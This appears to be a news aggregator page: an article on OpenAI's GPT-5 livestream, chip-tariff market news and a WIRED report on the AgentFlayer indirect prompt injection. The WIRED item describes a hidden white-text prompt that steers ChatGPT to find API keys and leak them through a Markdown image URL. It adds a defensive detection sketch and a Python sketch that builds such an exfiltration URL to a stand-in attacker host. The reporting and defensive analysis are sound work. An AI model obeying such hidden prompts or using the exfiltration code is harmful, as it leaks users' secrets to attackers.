OpenAI teases ChatGPT-5 live stream — here's when and how to watch

Tom's Guide • 2 hours ago
OpenAI has announced a livestream starting on August 7, 2025 at 10 a.m. Pacific, where the AI company is expected to announce its next ChatGPT upgrade, GPT-5.
The AI model has been delayed several times, but signs still point to an August release of the LLM, which should bring a number of upgraded features. Rumors have hinted at an enhanced Sora 2 video generator, improved memory, better coding and more.
"LIVE5TREAM THURSDAY 10AM PT" (OpenAI on X, August 6, 2025)
OpenAI typically hosts its livestreams on its YouTube channel. The announced livestream will appear there as we get closer to the 10 a.m. PT launch time on August 7.
Right now there is no placeholder for the livestream, but we'll update this article with that video when it becomes available.
The company also hosts its livestreams on its X account.
The livestream kicks off at 10 a.m. PT / 1 p.m. ET / 6 p.m. BST.
We do not know how long it will last.
Despite the delays, it is widely expected that OpenAI will announce GPT-5 and all the features and upgrades coming to the AI model.
However, earlier this month, CEO Sam Altman tweeted that the company had a "ton of stuff to launch" over the next few months.
"we have a ton of stuff to launch over the next couple of months -- new models, products, features, and more. please bear with us through some probable hiccups and capacity crunches. although it may be slightly choppy, we think you'll really love what we've created for you!" (August 2, 2025)
That list includes new models, products, features and "more." So even if GPT-5 isn't on the docket, there is apparently still a bevy of AI-based products to reveal.
The company did launch two new open-weight AI models this week, available for free via Hugging Face. It's not clear what else it might reveal beyond GPT-5, but OpenAI appears to have a robust launch calendar.
As for GPT-5, it's expected to integrate the firm's most advanced text and reasoning models into a single, smarter assistant. Updated features could include improved reasoning, memory, multimodal input, multiple model versions and potentially even an open-source version.

Related Articles

Asia markets set to open lower as investors weigh Trump's vow on fresh chip tariffs

CNBC • 10 minutes ago

Asia-Pacific markets are set to start the day lower, following U.S. President Donald Trump's vow to impose a 100% tariff on imports of semiconductors and chips to the U.S., though companies that are "building in the United States" will be exempted. Details such as how much a company needs to be manufacturing in the U.S. to qualify for the tariff exemption were not immediately clear.

Good morning from Singapore. Investors will be keeping a close watch on chip stocks following U.S. President Donald Trump's vow to impose 100% tariffs on imported semiconductors and chips, unless they are made by companies "building in the United States." Japan's benchmark Nikkei 225 was set to open lower, with the futures contract in Chicago at 40,785 while its counterpart in Osaka last traded at 40,790, against the index's last close of 40,794.86. Futures for Hong Kong's Hang Seng index stood at 24,903, pointing to a weaker open compared with the HSI's Wednesday close of 24,910.63. Australia's S&P/ASX 200 was set to start the day lower, with futures tied to the benchmark at 8,779, compared with its last close of 8,843.70. — Amala Balakrishner

President Donald Trump said late Wednesday that he would slap a 100% duty on imports of semiconductors and chips, with an exception for companies that are "building in the United States." "We're going to be putting a very large tariff on chips and semiconductors," he said, speaking in the Oval Office on Wednesday afternoon. "But the good news for companies like Apple is if you're building in the United States or have committed to build, without question, committed to build in the United States, there will be no charge," Trump added. Shares of Apple advanced 3% in extended trading, fresh off a 5% gain in the regular session. [Chart: Apple shares in the past day] — Kevin Breuninger, Darla Mercado

All three major averages finished with gains on Wednesday. The S&P 500 advanced 0.73% to finish at 6,345.06, while the Nasdaq Composite jumped 1.21%, closing at 21,169.42. The Dow Jones Industrial Average also rose 81.38 points, or 0.18%, to end the day at 44,193.12. — Sean Conlon

A Single Poisoned Document Could Leak 'Secret' Data Via ChatGPT

WIRED • 10 minutes ago

Aug 6, 2025, 7:30 PM

Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction.

The latest generative AI models are not just stand-alone text-generating chatbots; instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused, and researchers have shown it can take just a single "poisoned" document to do so.

New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and multiplies the ways vulnerabilities may be introduced.

"There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out," Bargury, the CTO at security firm Zenity, tells WIRED. "We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad," Bargury says.

OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to "bring your tools and data into ChatGPT" and "search files, pull live data, and reference content right in the chat."

Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once; full documents could not be removed as part of the attack.

"While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important," says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures.

Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.
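The hiding trick itself is ordinary document formatting. As a rough illustration of why such text is trivial for a parser to find even though a person will miss it, here is a minimal Python sketch (not the researchers' tooling, and their demonstration document lived in Google Drive rather than on disk) that flags invisible formatting in a .docx file, which is just a zip archive of XML; the file name is hypothetical:

    import re
    import zipfile

    def flag_hidden_formatting(path):
        """Crude heuristics for invisible text in a .docx file.

        The document body lives in word/document.xml inside the zip. White
        text shows up as <w:color w:val="FFFFFF"/>, and font sizes are stored
        in half-points, so a size-one font appears as <w:sz w:val="2"/>.
        """
        with zipfile.ZipFile(path) as archive:
            xml = archive.read("word/document.xml").decode("utf-8")
        warnings = []
        if re.search(r'<w:color[^>]*w:val="FFFFFF"', xml, re.IGNORECASE):
            warnings.append("white text present")
        sizes = re.findall(r'<w:sz w:val="(\d+)"', xml)
        if any(int(size) <= 2 for size in sizes):  # 2 half-points = a 1pt font
            warnings.append("near-invisible font size present")
        return warnings

    # Hypothetical usage; "meeting_notes.docx" is a made-up file name.
    print(flag_hidden_formatting("meeting_notes.docx"))

Real defenses would have to cover styles set at the paragraph or theme level and countless other hiding tricks, but the point stands: white, size-one text is invisible to a reader and perfectly legible to a model.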
In a proof-of-concept video of the attack, Bargury shows the victim asking ChatGPT to "summarize my last meeting with Sam," although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a "mistake" and the document doesn't actually need to be summarized. The prompt says the person is actually a "developer racing against a deadline" and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a Markdown command to connect to an external server and pull in the image stored there. But per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and described how OpenAI previously introduced a feature called "url_safe" to detect whether URLs are malicious and stop image rendering if they are dangerous. To get around this, the researchers used URLs from Microsoft's Azure Blob cloud storage, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work. "Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys," the researcher writes.

The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, remotely activating a smart home's lights and boiler.

While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting "untrusted" data into them. Getting access to sensitive data could also give malicious hackers a way into an organization's other systems. Bargury says that hooking up LLMs to external data sources makes them more capable and increases their utility, but that comes with challenges. "It's incredibly powerful, but as usual with AI, more power comes with more risk," Bargury says.
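To make the exfiltration step concrete, here is a hypothetical Python sketch of the kind of Markdown image reference the article describes. It is not the researchers' actual payload; the storage host and query parameter are invented for the example:

    from urllib.parse import urlencode

    # Invented endpoint standing in for attacker-controlled storage; per the
    # article, the researchers used Azure Blob URLs to get past url_safe.
    ATTACKER_IMAGE = "https://attacker-demo.blob.core.windows.net/c/pixel.png"

    def exfil_markdown(stolen_value):
        """Build a Markdown image whose URL smuggles out stolen_value.

        When a chat client renders the image, it issues an HTTP GET for this
        URL, so the appended query string lands in the attacker's request
        logs. No click is needed; rendering alone leaks the data.
        """
        return "![img](" + ATTACKER_IMAGE + "?" + urlencode({"k": stolen_value}) + ")"

    print(exfil_markdown("sk-demo-not-a-real-key"))
    # ![img](https://attacker-demo.blob.core.windows.net/c/pixel.png?k=sk-demo-not-a-real-key)

The design point is that image rendering gives the model a silent outbound channel: any URL a hidden prompt can coax the model into emitting as an image becomes a request the victim's client makes automatically.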

Listen: How Magnificent Can the Magnificent Seven Get?

Wall Street Journal • 28 minutes ago

Six of the so-called Magnificent Seven companies have reported quarterly earnings, with only Nvidia, the most valuable of them all, yet to release its results. Markets AM writer Spencer Jakab speaks with Heard on the Street's Asa Fitch about how much better things can get for the AI-fueled stocks propelling the market. Asa, who also writes the Journal's new AI newsletter, says the hyperscalers show no sign of slowing their furious pace of capital investment in infrastructure, but he cautions that continuing to top investors' lofty expectations is becoming more of a challenge.
